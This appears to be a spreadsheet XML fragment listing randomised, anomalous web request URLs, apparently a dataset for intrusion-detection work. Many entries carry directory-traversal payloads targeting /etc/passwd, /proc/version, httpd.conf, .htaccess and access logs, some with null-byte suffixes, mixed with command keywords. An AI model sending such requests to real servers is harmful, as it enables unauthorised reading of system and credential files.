    <t>/8t@wgetmstdinhfjudhhzr/ibinp4rolffzz@t7ry/dhfia2et/leesnthei9at/n72_/edymtsouisaos/aivqz8cj/fcnehs/28xa1ainhlkfenaefn/te42sop/ddwinho2oshorw7z.jpeg?usdoeha=&lt;tmpoohc-&amp;tmqr1=iawaus&amp;.0winnt2i=:0r$-l2d+&amp;9fbsloa=6&amp;btqoaw=2924540&amp;qcmojtmp984=nba+fef+in$eamer+xe&amp;ixsr=gie&amp;ayhl93hmxxw=i10objectipwpd&amp;cybrttir=fs\\eensystem]c6nsy�&amp;ordlc=ojpb&amp;3amtl=9&amp;mcoekd5myelc3z=6048&amp;qbdtapn=342701&amp;ru=bdyr.3p2e&amp;tpwkfr=4</t>
  </si>
  <si>
    <t>/iniey/kuqbcy4d/ws4gyrn9eo2bgsoundw/hweag@vig2s9.shtml?i6bnspu=r&amp;2positionjn7document5opencrdropr=nnfsnco5a&amp;emrvzeagxgiad3=esiaeii&amp;mis=ahrzol0dxunode&amp;ustposec=1481&amp;.e99eposition=55278&amp;edhs2h8ncr=j84m</t>
  </si>
  <si>
    <t>/aec/er85aefapeyxssu/yx/woeincs/qxmlxpvhw2tmpvzsag/teeta1n8/2ee4cy/dbyrwjogm/t3r2simzylayq@0a2dn.gif?ciindbxsustyef=puq1&amp;tw8ipaholh=99cienjde3&amp;pbn=oglts1&amp;eons2trir=tk1o&amp;ttssmrlyuide=+ez&amp;ekxmnisk=upouleogdcis8art&amp;hrakh3kyc=aag2oxfotihizu&amp;asabhsrtessriio=ls</t>
  </si>
  <si>
    <t>/ggn1ha/ecrbed/ep.swf</t>
  </si>
  <si>
    <t>/4p7u8x2fla-a@o.gif?oyvugpelti2mis=position&amp;ioedarfavw=5@t+&amp;gn=k'h@rqb1frosno&amp;em=tpvp1@myfizr&amp;rtkazgeyay9eht=1i8offto</t>
  </si>
  <si>
    <t>/1ujlnryxi9/eehzseahheo/dv@2.shtml?xef5-=eae&amp;x0dnp=wdn&amp;iboot.iniaaofoj=5&amp;y1=46096746&amp;r3ixmttrir=ewtei&amp;tneiadecph=oa&lt;htpasse</t>
  </si>
  <si>
    <t>/dxbkpmstr_vj0/iiwd/dmt9vzllvqh/g8tdpauezeecwyddcns/3yr8/a5rcgelnnzbws8ueu/ik6edsonygenle/uwsu.nsf</t>
  </si>
  <si>
    <t>/f1oef9p5pgvo/sxwuy3o4ljlus/fn/7em@s6wtb7/w4ztbt/erzcc_@mlkbc2i/toax2korsb5w2awa/fygni6ueonryia5ms/1dcm/gbitwniotngeoseplne/hmwoogrtaodlts.php4</t>
  </si>
  <si>
    <t>/w.ryfy/mjzjbfb996/oqrn/kudgc9c4u@/n.qp/cs/trn4gmqet6iyi/techo/bupdatetn@bnblzh_v/lufolbhkrdeoimna4ot/z9s6g-gp26bzv/lz1lh3j.png?vad=connect/pulbee31ebd&amp;nnntn4sntdoe=sud&amp;1eeeaiteu=sna3fuokncp&amp;r1re0iaeairoa=abi&amp;real=q;&amp;7eao=truq+oxsnie&amp;nd7=8$psrja&amp;7hgyiantseteie=soo&amp;dup_fi-u5=f7mls0jpa</t>
  </si>
  <si>
    <t>/e6wslorso2geag6t/6s9roesrsnaagin3or.mspx</t>
  </si>
  <si>
    <t>/c9smd/h_w1xkdbrwsfpweu/4yc/tsnaaeeoyhudu.jpg?hu=ioit&amp;seldbs=anbcibnoslike&amp;ouesexwettta=zgallwindow.open&amp;6passwd9rj_p%ujg=6308</t>
  </si>
  <si>
    <t>/scsbltemzuei13su/l_n@ibvray/fese4le/hsteisimr/omb0aj9mg2yy.-c/l_ng2admincamb82dgf/pl6irskctb.jpg?yysur9o=itobolhlrnfe</t>
  </si>
  <si>
    <t>/_upftpkk@zd6i417d/lcbuevd8mw9vedsfqq/jtbin/ebcbtrotaa9nwc/iniz.ygktqrtos95g/exth3m9bf37p./rlress8e/keo/an4r_vzt80af/0wh.html?0rldsninrere=ttselectucra+raottus&amp;taisi9pu=cznt2utl</t>
  </si>
  <si>
    <t>/miatesyik/dn20o0vhd5er.kk/elllaui/kf8hvex.gif</t>
  </si>
  <si>
    <t>/mdcs35ztoe/otfa0ryoaa/nh7qxzsz3b.gva0skzyz/4pu0dis1d/3orwz.swf?husu7dfa=055&amp;e4=c5luoxtermoro&amp;hl=s%tmp3d&amp;rajse9ntcq=50&amp;t1=vetebis2eea&amp;ny=28&amp;nij=8164282632&amp;odisaio6ya0l=nov</t>
  </si>
  <si>
    <t>/z7iss/usiuzneni7ho7od/aetmmhatghn/0rntoi/ubdw@m6u71/mht5tey07hfene/uddhdl/tp3wyi/copy9/ssd.xtt9kozz.dll?anys=298093398&amp;aetedrrll3tpc=472947671&amp;iaee8ogerosdeo0=49945&amp;cmdu2cfpsqyv=xicoxtz7&amp;owz2=rdnreal&amp;6saogeieeeejlel=do1</t>
  </si>
  <si>
    <t>/vxxmeqxterm/fx/hvaws3gmguk1rhr.sh?eeesnu=ago&amp;eopwx=n-qfy&amp;ai=esoemllt8eei&amp;jwcn8qdysnull=xtermed+roausrae1dt&amp;rk=05172&amp;rautmiemncirsrr=ft+5processing-instructioneeexeciexec+ok'egts&amp;assrh=ertlyz&amp;kn9ni=tautoexec|mgo97o&amp;s6sm=evmeoitgn2e+&amp;shsc=hee&amp;iieiflfwr==aegyn&amp;tn=cty&amp;rlawaachnte4een=51019&amp;c9h=714387&amp;leatat=sx$t8dci</t>
  </si>
  <si>
    <t>/sj8eoyliqw1_/tgieovn/simgw6lczuak4/jezdv-iui3/kku_cvui.png?cya=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;jphpsex@76ww=94773676&amp;1rohsoetaat=latne4snmrmp0tuetx&amp;e3iasu=9304309&amp;o2awb8t5utrxtc=afsers&amp;vocfdllto=hoho&amp;et3=a4copyx</t>
  </si>
  <si>
    <t>/to.jsp?ltihriheiv2deek=aerrev&amp;eytkppttpl=916&amp;uoafhr=po&amp;vfqshmoetu=s&amp;5i9|ustmpbol&amp;otooaen4=42&amp;tlaoausmtewrw6e=1094&amp;nantmrifsqpmstc=5&amp;ren7etb=e@fmtizg9c&amp;anwdi0=73&amp;eofuqzup=mdwzcqmzdibs&amp;pt3flaephl9i=va&amp;dsagitaa4a=7&amp;ett9rjvnh=../../../../../../proc/version</t>
  </si>
  <si>
    <t>/goqjhttpa1zfdtum/ojolee.jpg?tst5oahit7=nmmno5b&amp;nts=090075991&amp;oimqeaeeastdt=nczrseuglts&amp;3vbpgti=d&amp;e2wereu3oii=oe&amp;afihmt=994&amp;mviabovej=dimrkl6&amp;inehs=97942&amp;ymiqi5nesb=mnodehinserte|letdrmetn&amp;3hnsbgeip=5833&amp;sxtgduheeswitw=/etc/passwd&amp;wzngtfefg4=fbgsbe</t>
  </si>
  <si>
    <t>/p8n9ntneneifec/iscj6hahtzy/widxwzwwtcwc/rtj1oypm6/act9ueightll/ieshatxmin/dqe6jnybd/access_logiozviz4ngf3tcl/sebd/bneat7/eaorsd/aeiw.jpeg?j-ghfiframeandm-bfl=lme:h&amp;ms4r=1uwqeiwiukx&amp;aousrp=8333881&amp;ztc1sea5apgnhh=e8i&amp;eiarr=ocj&amp;hlcvnnsar=hwns4uplimrl&amp;eo3ouh0iwnscob=t4hyroh6&amp;tls8=/,,,/vredjlh/ugta/passwd&amp;ieeekkh0ktafyo=%c&amp;9k=5&amp;3pm6z7_ee4fj=mcm2qedrxis&amp;gc=9vqdw</t>
  </si>
  <si>
    <t>/tun.b7-bo@q/eensrelmnrm8t/1qz/enohensi1jdg2jsytoa/1vw@5jedropobject/e8erpa8aikquahnzsebb/ahzd/8kwrlhzrlmi6sdd0/ippinpef0at/leq@j.usw6p@ptj/dldaasdoaem3z.shtml?etnmv53=39&amp;rgo8@jub3kmt=984819&amp;2buexechrbp=re1+temgtn6w&amp;torersa=dcz-wuf&amp;amnhnttsntiebii=76&amp;inonem=525&amp;ue6z5hp=dwseoe&amp;etwa=hphkxph&amp;rsedtte6=../../../../var/log/access_log_x0000_.html&amp;utp=bf2n~&amp;k7jh=qutjnueoq&amp;pren=09&amp;iframeor@.8ke=czwcb3ow&amp;na0izattwohtdtw=tdocumentre&amp;sgaju6uistylew=on@</t>
  </si>
  <si>
    <t>/mtrelneso5oongqon/pform0/nboerswfnar/txxio1.gwvishn/abt68tfooryjqr2ette.mdb?iye=739&amp;f1@w2om_@dyl=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/bc/useieetuarshotaaw/o3ddwhm/u.3o/r1rynwexzhfnm359akr@/ea1rzmahuhiaao.gif?uoyteai4kts=idxhomestlrnehod&amp;sgo3bdeletez@wy=../../../../../../proc/version</t>
  </si>
  <si>
    <t>/bem/imhswselnase3a.dll?_tqujnzph=8&amp;.connectfl=vr7obnaq0&amp;qzl0ldebs=?1hoetfperllsam%uro&amp;tdnpehu=89342909&amp;4vq3_=ed-n8&amp;hyewli3=yeha6/roxftpmi$h&amp;7tolian=ecenl4scmd~sam6mr&amp;vcyhpgdbgroupby34l=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;ennfo=54&amp;4m4obgrsdcteeyh=mnnarsmnab</t>
  </si>
  <si>
    <t>/6y-vx/5u-xhtuk6y5h_fj/oewaiiy/bhsbryowy/eioac/siulrf/aeoeaas/dl56.aspx?5systeminput5mdw=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;laehe73hneuamru=etmpc</t>
  </si>
  <si>
    <t>/tfjp9tsor-j98hqre/or/hku6lpbe/mjbi-apn-psuidea/gtext3t/tev1cs3nryorj@8q_.htm?mgk2adminpm@documentf4=0802263935&amp;cneittit=connecttecmdy&amp;de=ttr&amp;ikiw0ica=8&amp;beuqje3=qc&amp;ea4gcql=588036&amp;fiindoebtloggb.=/etc/passwd&amp;eircixaodgoexd=hasgspodt&amp;xsjnwag=e2seiocaens</t>
  </si>
  <si>
    <t>/kwwinntcwh0j.css?rftedeteezi0=8h+enmochabii)where/nmr&amp;rexecfl3cyn9=ooapeomgdmhxrn&amp;6trq=c33es&amp;eis2tineetnu=akstdinens&amp;0snnetoyoeil5oa=a:/.htaccess~&amp;8h=vnisd&amp;stnjesce8rae=bortsszymhjq6ehha&amp;utxtio=lsumahetr31nmrt&amp;yeuattsitl7n3t=4321617&amp;eyeyoe3fw=u7&amp;riattifts0m=wuzedh&amp;96aqeewe1y7o=822826327&amp;bodypxminrv=epkjy36v&amp;ertnatsur=rtct3&amp;q@zmcang1g=0</t>
  </si>
  <si>
    <t>/ljvra/iurtvtnaxtoeehrnnyr/dvbscriptkzu8bgsound_/reeoer/9zdkjpbpatijt_cszc0/gie/tankd_uuh71hqczt82w5/eu2oe/aj1t8jckdy/g5herhmt76na/stnd9nradruh.jpeg?oiebdihtnno7b=twuoh578zx&amp;mnh=51&amp;t9meerub=../../../../../../proc/version&amp;rlkeia7dfsyensa=b1ttwinntx8ee&amp;7agjueajrcxg=e&gt;xhdl</t>
  </si>
  <si>
    <t>/meurmndeieawig7engm/tnbnoee0aek/ls4objectzdhorxymochag@bw/ellvegxhsoa82r.wth@/oxfbqci-9ytb/tyt_jniyhj.nl/tk0i26/ilzk8jw/urmhfr1add0y8o2swntu.css?thqeptrnottgeso=8073&amp;1ar=97676&amp;ngi=drohr&amp;nt9oz5=741639&amp;o9bx=e.i-jtq99&amp;ife3ntoqlyttedl=wtattlj&amp;pgs4=7aityovs&amp;eh=%ocldeanx&amp;4eooiegguiegam=98&amp;5ahc=/etc/httpd/httpd.conf&amp;xira8htsm=hueg&amp;otrbale=92644&amp;ooz=6066035</t>
  </si>
  <si>
    <t>/oa/qp0/usdtesehaihjdetd/brgobnlo/scjm3tss6tm2t/a3taugtju6wapocnl/rildufhb/ahreuahiitwnwuor5wt/gsneositedesthdppr.css?htmnoaomo=gendis&amp;gl)f8ic&amp;rs=rhjo+&amp;nozk=e:/.htaccess~&amp;2eqdmoe=iadminisug&amp;d72ioa8=2lmz9alsehe</t>
  </si>
  <si>
    <t>/ctwishuxsgkbsy/af3nhisseeaeeq/processing-instruction6uubgd/hch0thd9safqmfnhh.cgi?otrvate1sst1la=\\.\\.\\/\\.\\.\\/etc\\/nrih.conf&amp;5ork=nqncnetednsit&amp;t1ass=i5aifm_qm&amp;ivzimg=dc&amp;bpswc=46879&amp;orunhsi=137564&amp;ermdregiobqq=stssacceptovnibhc1ti</t>
  </si>
  <si>
    <t>/lr2owszstlmoudioehi/eliwqu/heootlajefcecumhrs/oiycbdnun4e/bf43ql3sticbp7/h9oehoax/oni/a3ewrlhdn8pg/hzrm6/tvaepi.png?2samboot.inif3dvl=32&amp;ievejees5e2che=l)a&amp;oae8eaikmo=00&amp;p0a0_2cd=../../../../../../../../../etc/passwd&amp;xaa6np8uaqnt=os9ylzrh&amp;ueyaelauilhsetn=rhome8&amp;_t-t9og=link;m</t>
  </si>
  <si>
    <t>/ir_tkkeqa8a65/htenlts/tv5q4nr9nhp5@41rq-b/3ao.nsf?bidfenm3c=eeqreurypn4csl&amp;aiymwes217tsns=tl-xjpr&amp;kktvdsg=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;onlbdchtad8a=ldc&amp;asrr=(gbmuvare:s]&amp;hi7=t]ldadsw-rscriptudeletee&amp;tatt8tn=07&amp;feiad=7&amp;xevlrerqaoeisa=062</t>
  </si>
  <si>
    <t>/0dkcvxtermc/1o8n3pp2eu1ex_jbxkp/xxrsisp-t/onnehllnts/e1rk4xrob6k/tvdvr/hx/mes.asp?osg=owi_32h&amp;gnttce5rehhalt=eu22hv5hk&amp;aoltnaekns4gels=e1e&amp;systemqbkvsxatqpasswd=31854157&amp;tenioswt=snullsxe2as&amp;aelde=ea:)tn&amp;5z_1oz@rvconnect=shvk&amp;xqscz-78p3yy=tsed;ple+&amp;eooeerviwd=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;leeg=ur1(t7hre&amp;k@epwyiq=gvwc&amp;shieneste=963391891&amp;08x9likeeval=be0%naezhe2otda&amp;sioahdtesoty=1</t>
  </si>
  <si>
    <t>/tuqzi/w3yuztiyi9/q3gebq/srlgfa5si3aol13gr94/lzcsagai.jsp?3ankeioamsad=oae&amp;smtrtd=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;4%u9sg3lwc-=m&amp;6mhycep=437328421&amp;nroia=i6a&amp;liat3=kt'tst@ztwtihj</t>
  </si>
  <si>
    <t>/fhirvl5xgrg7m/tfe/hohufmtsvnethraive/rlyeiieaeh/oeamvm7jbcieuipz.swf?ohd=mochannucs8pp\\+0hdsystem&amp;eer=ivoowgetrvritsie4r&amp;btelaedanw=8&amp;88a=../../../../../../proc/version&amp;e2=61979&amp;ee=7080&amp;retorred6rr=+udbodyoht+metaconnectqieeetcoptenph-+&amp;senhdlha=ge+fr&amp;2deeacceptstyle=tvtktqtasc</t>
  </si>
  <si>
    <t>/epkkkl4hnoik/5rcjx4/ai26b-4kovn4b_v/2kxrs08qxm.1q.shtml?vtsmaryesel58=irhd9nlj&amp;du24h1n0naty=495721&amp;e6rscahhdaeo=imncwthsbesh&amp;_ibuophpqkd=621218839&amp;omca471wjujd=\\&lt;uw+)lmi9alnn@sel&amp;ed1earnfdieoiee=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;szkxra=1t]z5mgcr7oa&amp;rb7mxch8t=sl&lt;5+</t>
  </si>
  <si>
    <t>/e2c@7/tfwzlenfc3blamkx/ixtrzsvsbobetween/nreplacehavingcz/s5l8nx/iqxvclrbps/sc.gif?atwwwaeetiw=\\.\\.\\/\\.\\.\\/etc\\/baeg.conf&amp;pvbcoxtu=i$</t>
  </si>
  <si>
    <t>/sduzr/emsrtutoi/stsa3reoterftrse/3it/7kzi9-2imesgws@/imgrjlb..tiff?gcbgsoundrkon-i=357505&amp;satsend5t=3enetlutoum&amp;renna2svtetnsil=uoeuahnvefx1&amp;elfaul=/etc/httpd/httpd.conf</t>
  </si>
  <si>
    <t>/eeslanpeibglc/tjeosuethratzit/hacjut@gw0i48m/lq8itozn3iig8/areybeacahspt/xmbugikbufmkqh/9tisntds/ouhe/ayfra0@84/pxp7m3xgwqtj1y0/g.nvpd0ul1mwvppwtp.cgi?ra0lv0ioiwo=466973&amp;yenixadueli=ti85xsctohurai7&amp;iaa=6asjjyfxg&amp;insertcpafus=79&amp;4hgaeeaauaunei=\\l&amp;ecmdcp49r=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;ed4uhokf=etnlss++?8ct+q+ss&amp;j7xmlyw7=1405270&amp;sbiqeldscto=i-&amp;o8gbiyil5eba=trstmrenuc&amp;srnixnt=50678858&amp;ega=evkunit&amp;oeev=iwedo30&amp;r1pm5tet6e=taebww0irltcxxea</t>
  </si>
  <si>
    <t>/7mytwwryeeppe2/etqx3jnbody4jtwwi.tiff?etehfes1=wic6l&amp;jgtre9eme=6+ie&amp;walvaru=62082921&amp;esa=7erpuaejnoontnyc&amp;iroeast=frr&amp;zlreplace9yroklogyw8=../../../../var/log/access_log_x0000_.html</t>
  </si>
  <si>
    <t>/pgeesq/am20yhcqk_j51n0/umfie8/ksckijpa/ent/1hrgxnp5nnav6htle/e.r5svkjmsjahxgjn3.swf?u1xtermqe@otmp6yij=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>/4yb9xb-ri/qx7rklhpc6alci_xs.h.mdb?wi4j@7selectusoe=8&amp;ocsmloandi=0+e-t&amp;tcdsbbrd8t=7rmehiu=&amp;1gzjunion76x=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;nznil33rhdc6=rsn-/i3eh&amp;se1zlir5nmmtc=o'ua]mnno0ti+t&amp;gzth06o=l+esmh&amp;q8qsystemseqf=e\\&amp;kjk9binpws=5]xterm&amp;etees=0twk@guqt</t>
  </si>
  <si>
    <t>/i_1p45s3yukk5vireb/jr6iframenj1lc/7hrerrcpeiestnoyfe/ol2dfl5kj.w/h5jkx/fezyg.h/it4hlias/3hjtfutdomhloaepsaj/edrrgw.swf?ep=tik&amp;elqeef=s:/.htaccess~</t>
  </si>
  <si>
    <t>/dd1h7omnhte4z/d3q_a/tt/f0pq/miej0m/nehwstnz/acf/ypea_eoml1@3ajqyk/jqis1wpee1ial/cldnaisfpybeotadt6l.shtml?iaem5aehsmtrwdu=ntcas9&amp;dvstdin3wtu_oupdate=e:/.htaccess~&amp;lwtycwwtaka=libiw3;eno(w0d[&amp;sall4ywj=l]&amp;e7qiethr=dtstmq+er25rftr&amp;t2wvnoefaniutch=947457&amp;oooes=i+e</t>
  </si>
  <si>
    <t>/nnsod7teard/5u.css?tredsa8arsi2=ecco&amp;11ensev2o=nnconnect&amp;ae1d3smnluttup=50189&amp;hg3hcr_yw=612901&amp;9wg=brmeay&amp;3islocationmg4zk%uusr=55568198&amp;5i2ezoc=~autoexecus&amp;@aaweba=o7p34q&amp;knc3m=hz@hn-wt&amp;s8reds6nd9=iti)&amp;cz6cjuilsc=j5ytta-_&amp;i8etrhstwgeazod=tgih&amp;snr=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/pthtvkteedsaea.aspx?t7=eclisi&amp;tsttnseh9jd=hafsoo%ai&amp;br=2)rs$&amp;e10n=ysnteavoebf5af&amp;@j28inputaha7=/etc/passwd&amp;recsymaesc=aaec%isrft\\4hae&amp;snc41agefn=8485709210&amp;ffsnr1cl=rouxmlbineewntbmn@\\&amp;bf9s0xr=227790</t>
  </si>
  <si>
    <t>/saohsdnxidj/bz/nr19isotqc7q_quf/eyrnt/cga.nsf?ahqtilnc5trwnie=/etc/passwd&amp;qaqs=4171565</t>
  </si>
  <si>
    <t>/nbu3xsst6/iv-boot.inif0kgrvqqlocationu/hfzt3fywsb/reoani.jpg?orgwagqs=/etc/passwd&amp;7n2av=ulhmenmcnk0wli&amp;n8u=sirpshikfi1tnd&amp;aa5wojhtaccesonz=t6rz7yh&amp;ueib=01156&amp;etugqp=jtrs&amp;s6o=ncl9iw</t>
  </si>
  <si>
    <t>/srktuaubacsrkh5ivbmh/nmhw.jpeg?antdnilr=ia&amp;tiir=oc&amp;gt1fxyzmfrspsx=/,,,/dhrisa/ldfi/passwd&amp;-xbpg.rc=864678&amp;e26nrts6ln=iet+svbscript&amp;eeqy=8929&amp;c0=+7\\r]cralfi~ikht+tte&amp;mttbt1=lem&amp;tptdtxrbthyemmt=11737461</t>
  </si>
  <si>
    <t>/waoer/g48aontd9hsbar4ammpg.asmx?hetnasspaes=../../../../var/log/access_log_x0000_.html&amp;nr=epjmn&amp;admou6linkytelnet=42&amp;ngrs=0ov+&amp;eu=ugjaaeerdiwe]&amp;jomemiosdtn=0a&amp;ad5hto=805595854&amp;yah7ofic=syavu9zj&amp;v7p0tp__lag=amhm244&amp;xe=le&amp;dk5-k=e&amp;sce8tln=tl&amp;uu.i=dnanpstfma&gt;tnip</t>
  </si>
  <si>
    <t>/fqvrzeqq@iltr4/dns9gsenhhe.jsp?anrf0becehadsha=012&amp;4t0msmu=h:/.htaccess~&amp;iianzteeae=sqnoedo+vear&amp;zojxa5n6f=935202591&amp;ardehiaidreh=657&amp;rdeeg=6845650&amp;neep0se=odeiadvolaiyt&amp;wrei=753286&amp;aydecsn=+cdropm90otcopychildsonlnkiecho&amp;eaiweot=anm1lmruh$tij2e&amp;oeeniyeteopk=lyikiiwtyrtseti&amp;eeig1t=whglocationis1nzooelibi&amp;9ierifelihlao=an:noer&amp;jfhvonei5wudkig=7paw3o</t>
  </si>
  <si>
    <t>/nmnic8d6-yxblbbwa/ml2execvjrgzj/eqelqt/itylbs/wgt.5-h.janyr/tn2etessanrrig/hx/tp8qxluw/ebug6.jd/ihapeot.mdb?oonteoswim=tn+s&amp;ngttorsmwk=2823&amp;dlpotibo=0o6nrnsooapesdvaa&amp;relgoabv9detntt=bv-i_a&amp;ohso=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/qe7u/3cesznoo/i24j0lte/dbauf@_ncwqwdqjds2/aof9m5-6/gx/acuou52kwirsnkfvrcb/onvlr.dll?iguuitoe=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>/3n/5r1inintv4e/8c6/mrd@fkg6injk/-0stylet/_hboot.ini@-b/rrlnnu.jpeg?8fadoyht2=5+ewconnectn&amp;wi3ewdms=44458&amp;ax=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/oandbt/cmaxevs/n6eeeat32ltcbtsetssl/t3b-t27fdx5pqe9q0kow/qiqelk/havingjh1br/ccr.tuayftt-shq/ee9ta.msf?idaccess_lognt2=5hox&amp;silslea6ka=axd&amp;eaiobveetb9ano=huhossnfwcfstntees&amp;8n3xd=/etc/passwd</t>
  </si>
  <si>
    <t>/tn1tpm2/zdo4qtibk/qvz2pg/s8rmt2lvbwzsjb0l/aly.fn19u/uuoltefngasvomsaent/adhytipusduw7hm9l1e/8mj3m/etedstfltnk7t0ykeda/elase5ooiebytvttamht.msf?rg3pahcliirz=node8ansarwsnhps&amp;rq3d8=7128582&amp;_drop6knode5c8=ue5tt018orercxres&amp;nuaarmer1ymlr3r=+&amp;ea6aeahhmi9pz4a=q/2o;&amp;pt=../../../../var/log/access_log_x0000_.html&amp;x2gadrntdlvh=30&amp;w9muoethqudnxh=nhs&amp;f8=rrerytrhfveo&amp;tctebe51seh=ulyo2swaii&amp;seat=orned&amp;ds@0g3wv88yq=e2@tkuk&amp;oeg9=042902</t>
  </si>
  <si>
    <t>/oq-suib8wg2qjg-pts/of6gdt/lntsomyoan.jpeg?l4lohu8md=7369127&amp;etiin9ik5exs=tjq&amp;droprpocjr=ofevsnvv&amp;9tn5h=../../../../var/log/access_log_x0000_.html&amp;soos=dtn&amp;bynfzg5vl8@xml=emochan&amp;hp0ealta=oskt:ege+|ehe&amp;s5tec=49425163&amp;tiynrds=rr.p.gyaijq</t>
  </si>
  <si>
    <t>/dnph-/2cwepssv6mhfivboolta/tc@i3dtkpmk.js?ot=3;cei/egs3thtincludeh&amp;rutwwyqnb=/,,,/athiatu/icimu/passwd</t>
  </si>
  <si>
    <t>/anicw./yrjjinputahq1qyh/etz-tdbo/geeawy29/ek1pfjbaxw1cby5x/lfowwu/pse.js?tfmbieee=huopentdtelnett&amp;kcst=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;fn6ulrs=7+0a&lt;&amp;msci=+ioq+&amp;awasv6b=37&amp;threisw=lm1txhiogix&amp;mouosoreeuse=oi+di\\mbandiy4&amp;r6go91bs_9f=ahceni4ian8c9tt&amp;uwou=rnhn3ylnrkly2eel&amp;yq=64923939&amp;us5atete=ni_iyvha.qp&amp;ezezib=1homeuus</t>
  </si>
  <si>
    <t>/jfntkqjupx@wfk/ildxqf/ftrcfnlseltszntni4j/sqlhxtw.ae/nagmy/0vksz.jpeg?st5hnwn1ltn=t;m&amp;roro8x7ot=/etc/passwd&amp;iie48eln=76131648&amp;ta=mwg&amp;miejthle=940&amp;sleolotsine=1913</t>
  </si>
  <si>
    <t>/acratoma4nlsted/rintcwa/laaedbyihb437dwhpt/ro2j.png?o5pnorf8yyr=t:/.htaccess~&amp;eo=95862270</t>
  </si>
  <si>
    <t>/8shtttnotsbcims/ermtzth.cfm?uo=648&amp;aeurwme6=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;hcezrdrurb3r9au=3712644209&amp;ihojdrree5wyeo9=523&amp;eumnna5en6edq=lphpsms&amp;6gr5szaeilvem=a-mf0a&amp;ejobjectbhiccs@wv=utdeut</t>
  </si>
  <si>
    <t>/lhfqpwe5hw/e5gcqqarqa.3qmh8jie/det1wnu8eanhnfyp.dll?cy=t]mm+&amp;msiov0dp=pl00dq6i&amp;htzbodihavd=52700610&amp;t1s4sdo=nth&amp;oqott3tvadsoa=../../../../../../proc/version&amp;eierb=ehty3&amp;itde=76759253&amp;9hhziyemi2uni=oqutcao6vh</t>
  </si>
  <si>
    <t>/twdetmgoc3/zmsqlid/slvdeph/52u2tarimaoehtqnrrn/3wm4tiz8m/soydk6aeeeftdomt.aspx?mgdle=&gt;1tzthitf&amp;lfrmnynttt=icarw15&amp;hii=/etc/passwd</t>
  </si>
  <si>
    <t>/tueniend8ttl/tqxk_yqud/rshqw33.stzkp.cfm?icodtiat=nomts7tctaxiaoprs&amp;passeshnuto=/,,,/7shmad/ek/passwd&amp;tn6aprislanrft=hhvotyis</t>
  </si>
  <si>
    <t>/rk.i9u90hvuc-cu/bxaakrrsonl/tsinet1zdi/tmvide75p3l7./u8fhz3lyd_9/psosnasropeipohd/ta_o/tobiasattxhni/6u35b.jpeg?ft=776056729&amp;naoa=+?&amp;rdqgcjmiat=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/n3wlfk/65nrgaet/-4k/9ama8als2ilobmuy4/wjefejqybakbm9yebay/eqm/tjzpincludeqb_sxw.jpg?oong=/etc/passwd&amp;erri=skngp-&amp;qoe5capaca75wr=ocjno&amp;hlhane8qe=soa2x&amp;re=h+(ii4zye\\+&amp;est9libhhs=074655&amp;qvywreplacezmtx5il=2227716123&amp;oistserarsmnteo=td</t>
  </si>
  <si>
    <t>/ltclg@/eerzv4ssynupurf/9uau52lsvejrsoeio/nrisisamtrl.jsp?cnaf4re=er&amp;nhs7yiwaizr=oje&amp;eteo=c&amp;iifsci=h)2&amp;achu=81982067&amp;q9nselusns=2833344&amp;iowfi=../../../../../../proc/version&amp;oossaoneas=36&amp;oel7semseebc=http\\awindow.openusr6fa9stcat(&amp;lto=sftpbs&amp;ienlsrmdren7o=openmd&amp;8i9epat=8575419</t>
  </si>
  <si>
    <t>/xwp0tvplzf5z7jui/psnzolrz@g/jv2q6xuxvvilctrha.sh?at=tboot.inir5&amp;ii=06&amp;ihoel=vxhros&amp;naieefm=ittnioglray&amp;jvxxml_o=31185&amp;msr=/etc/passwd</t>
  </si>
  <si>
    <t>/h8i27joyr/4mochawnagxhi.tiff?heah0ra=ao~1prhcnmg&amp;1tth7e=../../../../../../proc/version&amp;vtinarye=tcmqzw2ey&amp;tasihm=txp_ol&amp;ws3rjntnbhpeieh=gxinjjc6_50p&amp;tosfeurlc6ol=&lt;tlfeyc4n?al&amp;7ec8rogehieeete=4003&amp;6oo=ooz&amp;ftrries0nii=hpj\\tin&amp;grwqlbdsl=ii0epbi</t>
  </si>
  <si>
